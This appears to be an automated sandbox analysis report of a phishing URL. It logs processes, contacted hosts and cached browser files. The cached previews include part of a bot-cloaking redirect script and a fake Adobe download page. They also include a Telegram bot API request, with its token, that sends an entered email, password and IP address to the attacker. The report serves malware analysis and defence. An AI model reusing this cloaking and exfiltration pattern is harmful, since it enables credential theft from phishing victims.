        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,1981881385979211426,8084460944875189349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://savory-sweet-felidae-psrnd.glitch.me/"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,1981881385979211426,8084460944875189349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
        Browser Extensions        		1
        Process Injection        		1
        Process Injection        		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Web Service        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
        Ingress Tool Transfer        		Scheduled TransferData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        https://savory-sweet-felidae-psrnd.glitch.me/0%Avira URL Cloudsafe

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://www.nordicplow.com/favicon.ico0%Avira URL Cloudsafe
        https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.png0%Avira URL Cloudsafe
        https://www.fikox.com/0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        nordicplow.com
        		192.124.249.155
        		truetrue
          		unknown
          www.google.com
          		142.250.186.164
          		truefalse
            		high
            api.ipify.org
            		104.26.12.205
            		truefalse
              		high
              upload.wikimedia.org
              		185.15.59.240
              		truefalse
                		high
                savory-sweet-felidae-psrnd.glitch.me
                		34.233.109.53
                		truefalse
                  		unknown
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    www.nordicplow.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189false
                        		high
                        https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svgfalse
                          		high
                          https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svgfalse
                            		high
                            https://www.nordicplow.com/favicon.icofalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://savory-sweet-felidae-psrnd.glitch.me/false
                              		unknown
                              https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.pngfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.nordicplow.com/wp-admin/includes/fotex.htmltrue
                                		unknown
                                https://api.ipify.org/?format=jsonfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://api.telegram.org/bot$chromecache_41.3.drfalse
                                    		high
                                    https://www.fikox.com/chromecache_44.3.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.office.comchromecache_41.3.drfalse
                                      		high
                                      https://api.ipify.org?format=jsonchromecache_41.3.drfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        34.233.109.53
                                        		savory-sweet-felidae-psrnd.glitch.meUnited States
                                        		14618AMAZON-AESUSfalse
                                        104.26.12.205
                                        		api.ipify.orgUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        192.124.249.155
                                        		nordicplow.comUnited States
                                        		30148SUCURI-SECUStrue
                                        149.154.167.220
                                        		api.telegram.orgUnited Kingdom
                                        		62041TELEGRAMRUfalse
                                        239.255.255.250
                                        		unknownReserved
                                        		unknownunknownfalse
                                        185.15.59.240
                                        		upload.wikimedia.orgNetherlands
                                        		14907WIKIMEDIAUSfalse
                                        142.250.186.164
                                        		www.google.comUnited States
                                        		15169GOOGLEUSfalse

                                        Private

                                        IP
                                        192.168.2.6
                                        192.168.2.24

                                        General Information

                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1591150
                                        Start date and time:2025-01-14 18:21:23 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 3m 2s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:browseurl.jbs
                                        Sample URL:https://savory-sweet-felidae-psrnd.glitch.me/
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal80.phis.troj.win@17/21@20/9

                                        Warnings

                                        • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.74.195, 142.250.185.110, 142.251.168.84, 142.250.186.78, 142.250.185.238, 142.250.184.206, 142.250.184.234, 216.58.206.74, 172.217.16.202, 142.250.186.42, 216.58.212.170, 172.217.18.10, 142.250.185.234, 216.58.212.138, 142.250.185.74, 142.250.186.74, 142.250.186.170, 142.250.185.138, 142.250.185.202, 142.250.185.106, 172.217.18.106, 142.250.185.170, 199.232.210.172, 2.23.77.188, 172.217.16.206, 142.250.184.227, 13.107.246.45, 184.28.90.27, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • VT rate limit hit for: https://savory-sweet-felidae-psrnd.glitch.me/

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        Chrome Cache Entry: 40

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):5094
                                        Entropy (8bit):4.834039771497343
                                        Encrypted:false
                                        SSDEEP:96:5NfSH5pziTJNziTzJgaH+PRpJM+GKq4MsB4Hz7oG9fpdOiXlj8Hdaus:jo+TSTFgaePjC+GKx4T7okHONaus
                                        MD5:A8FEAF8EA80C17228A67DFEB1E251D8F
                                        SHA1:38A4598BA356C8E43E6A6EA2E59587AB76D26A05
                                        SHA-256:35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3
                                        SHA-512:0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164">. <g transform="translate(53.548057 -183.975276) scale(1.4843)">. <path fill="#ff2116" d="M-29.632812 123.94727c-3.551967 0-6.44336 2.89347-6.44336 6.44531v49.49804c0 3.55185 2.891393 6.44532 6.44336 6.44532H8.2167969c3.5519661 0 6.4433591-2.89335 6.4433591-6.44532v-40.70117s.101353-1.19181-.416015-2.35156c-.484969-1.08711-1.275391-1.84375-1.275391-1.84375a1.0584391 1.0584391 0 0 0-.0059-.008l-9.3906254-9.21094a1.0584391 1.0584391 0 0 0-.015625-.0156s-.8017392-.76344-1.9902344-1.27344c-1.39939552-.6005-2.8417968-.53711-2.8417968-.53711l.021484-.002z" color="#000" font-family="sans-serif" overflow="visible" paint-order="markers fill stroke" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feat

                                        Chrome Cache Entry: 41

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, Unicode text, UTF-8 text
                                        Category:downloaded
                                        Size (bytes):5875
                                        Entropy (8bit):4.39212305369154
                                        Encrypted:false
                                        SSDEEP:96:8N+TMXNrFL8FkV8FkPFi3mJBpRPaVO5jxJIs1V6osNv6D7RnsDJdiQlXMz:8N3RFL8FkV8FkPFi3mJ1EOvJIOsNixnR
                                        MD5:19F710D6BBAE893DE88DB51707251AA1
                                        SHA1:7225538EAE4CA0847E5DD57C2886813AC1512DE9
                                        SHA-256:B48FCD71F2AB56C8722C9AA9857E0559290E2240296026ABCD62CC055A8ABFBE
                                        SHA-512:BC129124EE0453C5F421FE462A10CBED0E3C4535FA13E8176FB4C643965AB215F32F5B7D839D809763899F08C33BE38D3CCBAD0AD7429B474BE9AA3AD8C251AC
                                        Malicious:false
                                        Reputation:low
                                        URL:https://www.nordicplow.com/wp-admin/includes/fotex.html
                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Download File</title>. <style>. body {. margin: 0;. padding: 0;. font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;. background-color: #f3f2f1;. display: flex;. justify-content: center;. align-items: center;. height: 100vh;. flex-direction: column;. }.. .header {. width: 100%;. padding: 15px;. position: absolute;. top: 0;. left: 0;. display: flex;. justify-content: left;. align-items: center;. }.. .header img {. width: 30px;. margin-left: 20px;. }.. .adobe-logo {. margin-top: 10px;. margin-bottom: 20px;. }.. .adobe-logo img {.

                                        Chrome Cache Entry: 42

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):272
                                        Entropy (8bit):4.825230707379318
                                        Encrypted:false
                                        SSDEEP:6:tI9mc4sl3u7Ee/Uw4tzC/CHftwHK32KHzCF3cHoKgwHKY:t41uwPwge/CHFyKGKHeVpyKY
                                        MD5:363FDD53D34303B727D9DAB161B8E88B
                                        SHA1:5B170117926AE5A5E451AA24676B5A124C2FA122
                                        SHA-256:3D41251F93127B4B42C2F69FA423D204946CF9C307D786EA36B8D9BEF4179282
                                        SHA-512:6369E9E3B0F49D5BE6C43724C01D34E7B9871E9D709C628ED0963B94183729AABB2D9778EED4405D87C5080DEA19156970DAB6B8D69EDB860ADC5C1A400FAFB3
                                        Malicious:false
                                        Reputation:low
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h10v10H12z"/></svg>

                                        Chrome Cache Entry: 43

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):478
                                        Entropy (8bit):5.1929010900410555
                                        Encrypted:false
                                        SSDEEP:12:YKOHu/P8jTfUiUa3XHJZjxAqWEW4fJm8x2BumEMVEiWGUfh4bROC79:YKOHbH3UaHJh6qWKRmM2BnjVEMbROC79
                                        MD5:E817B40200087645E44855E6DC31DE76
                                        SHA1:DAAF7F2EC59C8B21A77B427357E48CF619425F94
                                        SHA-256:0052E4CD8C929640E465F6BEF22DBF98C81A811699C99962E122CED9C9CA966A
                                        SHA-512:D872366158FAE25C835087CD69367EA3DCC9CE2CE411ADB06066A995E74606207704DDF57359A0CEECD9BF1BAEDFD61567D14358D68A22DDD74BC57AF5A59656
                                        Malicious:false
                                        Reputation:low
                                        Preview:{"ok":true,"result":{"message_id":865,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875388,"text":"***** TX40 Adobe R\u034fe\u034fs\u034fu\u034fl\u034ft\u034f *****\nEmail: q4ft2u@ngw.net\nPassword: G_@s)w?ufRY\nIP: 8.46.123.189","entities":[{"offset":43,"length":14,"type":"email"},{"offset":84,"length":12,"type":"url"}]}}

                                        Chrome Cache Entry: 44

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text
                                        Category:downloaded
                                        Size (bytes):1266
                                        Entropy (8bit):4.169347964818518
                                        Encrypted:false
                                        SSDEEP:24:hYkCLHqt4gp0gJexFU5Jy+pMcnVsBifqA4No:gis/U5Jy9MAiwNo
                                        MD5:548469B1563D7E4026CDB3357654DEDF
                                        SHA1:DF2C4AEF8939A8B4B40C64DD4374F75B8375E984
                                        SHA-256:DD36263940485121EBA7400AEBCAB21EC12168EE5FD1C21473DEEB44E05DCBFB
                                        SHA-512:328073DEA640C50B647A9A5FD36AD4C2260322D9BD2D038516B4AD089922A4ACF887E8FA0EFDDA02704629033FD4248EDD5EAC0DC497AF58F0FD6EF70E01428D
                                        Malicious:false
                                        Reputation:low
                                        URL:https://savory-sweet-felidae-psrnd.glitch.me/
                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Working...</title>. <script type="text/javascript">. function cloakingRedirect() {. var userAgent = navigator.userAgent.toLowerCase();.. . var botUserAgents = [. 'googlebot', . 'bingbot', . 'slurp', . 'duckduckbot',. 'baiduspider',. 'yandexbot', . 'facebookexternalhit', . 'twitterbot', . 'facebookbot' . ];.. var botRedirectUrl = "https://www.fikox.com/"; . var userRedirectUrl = "https://www.nordicplow.com/wp-admin/includes/fotex.html"; .. . for (var i = 0; i < botUserAgents.length; i++) {. if (userAgent.indexOf(botUserAgents[i]) !== -1) {. . win

                                        Chrome Cache Entry: 45

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):4119
                                        Entropy (8bit):7.949120703870044
                                        Encrypted:false
                                        SSDEEP:96:h3bdWfcmTY+aRF1pXWZL2+42HGhIUc8KeLEd:hgXTY+as02mOB8XLEd
                                        MD5:000BF649CC8F6BF27CFB04D1BCDCD3C7
                                        SHA1:D73D2F6D74EC6CDCBAE07955592962E77D8AE814
                                        SHA-256:6BDB369337AC2496761C6F063BFFEA0AA6A91D4662279C399071A468251F51F0
                                        SHA-512:73D2EA5FFC572C1AE73F37F8F0FF25E945AFEE8E077B6EE42CE969E575CDC2D8444F90848EA1CB4D1C9EE4BD725AEE2B4576AFC25F17D7295A90E1CBFE6EDFD5
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR...P...P............IDATx..].xU...[..V..*).Kk...V.k..J]jKEl?...t...!.{.,...E........@....F.%.....B...N.y..w.....I{.o...;.s..3...WH......./.zBp.o,XW.......#Z.f...|mvD..9..F........y..o....1^.743l.......v..#.c.E&.e..hU1.{..........._cZ..We.v.....f.w....(..6|.Y.. I:x..-.&.......D........<.6.6.l....T..)...|....#..$g...VN.......!'/6.w..B.h.}....EV.......k.7" f.}.G.~#..M..+....G....iB......]..?+......'.j.GB..P%......\........../..%...&.8E...".........44.J...1.........S...........d.j..]ni%._..9.{.O?.H..6T.|A.GC..g...U.oDEt,?.0....~....q=.y.~.9.Z......c...v.._....$.0.2...F.9a.L..)..l...2...w...I..&....Vg......H.I..r......./....z.`..+...Z.^U.=..5aBpb..0< ../>.9.c....".I..0.3N,}}....|]Fb...Q.......W.....OQ..y;.....|.37..}.....(c.....X..`xX).;......<5S....>.9..G.:..=..0^.......l_<G......H....C.O.*.....Hk{..{....]Nc..B.8..}%>..w....Z...).....\..>....c..2...&..0'.DZJ.'~{Y....I....?........fR.a......;.<..lRG..n.....Q......Nf.6.

                                        Chrome Cache Entry: 46

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):28
                                        Entropy (8bit):4.378783493486175
                                        Encrypted:false
                                        SSDEEP:3:qinPt:qyPt
                                        MD5:4C42AB4890733A2B01B1B3269C4855E7
                                        SHA1:5B68BFE664DCBC629042EA45C23954EEF1A9F698
                                        SHA-256:F69E8FC1414A82F108CFA0725E5211AF1865A9CEA342A5F01E6B2B5ABE47E010
                                        SHA-512:0631C6EFD555699CB2273107FE5AF565FEC2234344E2D412C23E4EE43C6D721CB2B058764622E44FD544D840FF64D7C866565E280127C701CAAB0A48C35D4F5C
                                        Malicious:false
                                        Reputation:low
                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwne-Yjvve0itBIFDYOoWz0SBQ3OQUx6?alt=proto
                                        Preview:ChIKBw2DqFs9GgAKBw3OQUx6GgA=

                                        Chrome Cache Entry: 47

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):4119
                                        Entropy (8bit):7.949120703870044
                                        Encrypted:false
                                        SSDEEP:96:h3bdWfcmTY+aRF1pXWZL2+42HGhIUc8KeLEd:hgXTY+as02mOB8XLEd
                                        MD5:000BF649CC8F6BF27CFB04D1BCDCD3C7
                                        SHA1:D73D2F6D74EC6CDCBAE07955592962E77D8AE814
                                        SHA-256:6BDB369337AC2496761C6F063BFFEA0AA6A91D4662279C399071A468251F51F0
                                        SHA-512:73D2EA5FFC572C1AE73F37F8F0FF25E945AFEE8E077B6EE42CE969E575CDC2D8444F90848EA1CB4D1C9EE4BD725AEE2B4576AFC25F17D7295A90E1CBFE6EDFD5
                                        Malicious:false
                                        Reputation:low
                                        URL:https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.png
                                        Preview:.PNG........IHDR...P...P............IDATx..].xU...[..V..*).Kk...V.k..J]jKEl?...t...!.{.,...E........@....F.%.....B...N.y..w.....I{.o...;.s..3...WH......./.zBp.o,XW.......#Z.f...|mvD..9..F........y..o....1^.743l.......v..#.c.E&.e..hU1.{..........._cZ..We.v.....f.w....(..6|.Y.. I:x..-.&.......D........<.6.6.l....T..)...|....#..$g...VN.......!'/6.w..B.h.}....EV.......k.7" f.}.G.~#..M..+....G....iB......]..?+......'.j.GB..P%......\........../..%...&.8E...".........44.J...1.........S...........d.j..]ni%._..9.{.O?.H..6T.|A.GC..g...U.oDEt,?.0....~....q=.y.~.9.Z......c...v.._....$.0.2...F.9a.L..)..l...2...w...I..&....Vg......H.I..r......./....z.`..+...Z.^U.=..5aBpb..0< ../>.9.c....".I..0.3N,}}....|]Fb...Q.......W.....OQ..y;.....|.37..}.....(c.....X..`xX).;......<5S....>.9..G.:..=..0^.......l_<G......H....C.O.*.....Hk{..{....]Nc..B.8..}%>..w....Z...).....\..>....c..2...&..0'.DZJ.'~{Y....I....?........fR.a......;.<..lRG..n.....Q......Nf.6.

                                        Chrome Cache Entry: 48

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):478
                                        Entropy (8bit):5.190099914260619
                                        Encrypted:false
                                        SSDEEP:12:YKOHu/PNjTfUiUa3XHJZjxAqWEW48x2BumEMVEiWGUfh4bROC79:YKOHqH3UaHJh6qWKM2BnjVEMbROC79
                                        MD5:75E4BFD3BB817395498D9D9D1DFC87C0
                                        SHA1:BA41E64C9452A41DFD8875A54C902FABFA843EC3
                                        SHA-256:B62E85C70293867DC36778E3D1A4660A6800BB12218074FA032F7F910C929743
                                        SHA-512:5018CB7DE1212D762BD86539AA3AAF93237E5EE5E1BD725B40A1E4100788378F52153A75DDDC3D94B431AE884E5B688338E4411BBC276E6E1B1EF934B5023D35
                                        Malicious:false
                                        Reputation:low
                                        URL:https://api.telegram.org/bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189
                                        Preview:{"ok":true,"result":{"message_id":864,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875387,"text":"***** TX40 Adobe R\u034fe\u034fs\u034fu\u034fl\u034ft\u034f *****\nEmail: q4ft2u@ngw.net\nPassword: G_@s)w?ufRY\nIP: 8.46.123.189","entities":[{"offset":43,"length":14,"type":"email"},{"offset":84,"length":12,"type":"url"}]}}

                                        Chrome Cache Entry: 49

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):5094
                                        Entropy (8bit):4.834039771497343
                                        Encrypted:false
                                        SSDEEP:96:5NfSH5pziTJNziTzJgaH+PRpJM+GKq4MsB4Hz7oG9fpdOiXlj8Hdaus:jo+TSTFgaePjC+GKx4T7okHONaus
                                        MD5:A8FEAF8EA80C17228A67DFEB1E251D8F
                                        SHA1:38A4598BA356C8E43E6A6EA2E59587AB76D26A05
                                        SHA-256:35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3
                                        SHA-512:0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094
                                        Malicious:false
                                        Reputation:low
                                        URL:https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164">. <g transform="translate(53.548057 -183.975276) scale(1.4843)">. <path fill="#ff2116" d="M-29.632812 123.94727c-3.551967 0-6.44336 2.89347-6.44336 6.44531v49.49804c0 3.55185 2.891393 6.44532 6.44336 6.44532H8.2167969c3.5519661 0 6.4433591-2.89335 6.4433591-6.44532v-40.70117s.101353-1.19181-.416015-2.35156c-.484969-1.08711-1.275391-1.84375-1.275391-1.84375a1.0584391 1.0584391 0 0 0-.0059-.008l-9.3906254-9.21094a1.0584391 1.0584391 0 0 0-.015625-.0156s-.8017392-.76344-1.9902344-1.27344c-1.39939552-.6005-2.8417968-.53711-2.8417968-.53711l.021484-.002z" color="#000" font-family="sans-serif" overflow="visible" paint-order="markers fill stroke" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feat

                                        Chrome Cache Entry: 50

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):21
                                        Entropy (8bit):3.594465636961452
                                        Encrypted:false
                                        SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                        MD5:909AD59B6307B0CD8BFE7961D4B98778
                                        SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                        SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                        SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                        Malicious:false
                                        Reputation:low
                                        URL:https://api.ipify.org/?format=json
                                        Preview:{"ip":"8.46.123.189"}

                                        Chrome Cache Entry: 51

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):272
                                        Entropy (8bit):4.825230707379318
                                        Encrypted:false
                                        SSDEEP:6:tI9mc4sl3u7Ee/Uw4tzC/CHftwHK32KHzCF3cHoKgwHKY:t41uwPwge/CHFyKGKHeVpyKY
                                        MD5:363FDD53D34303B727D9DAB161B8E88B
                                        SHA1:5B170117926AE5A5E451AA24676B5A124C2FA122
                                        SHA-256:3D41251F93127B4B42C2F69FA423D204946CF9C307D786EA36B8D9BEF4179282
                                        SHA-512:6369E9E3B0F49D5BE6C43724C01D34E7B9871E9D709C628ED0963B94183729AABB2D9778EED4405D87C5080DEA19156970DAB6B8D69EDB860ADC5C1A400FAFB3
                                        Malicious:false
                                        Reputation:low
                                        URL:https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h10v10H12z"/></svg>

                                        Chrome Cache Entry: 52

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):21
                                        Entropy (8bit):3.594465636961452
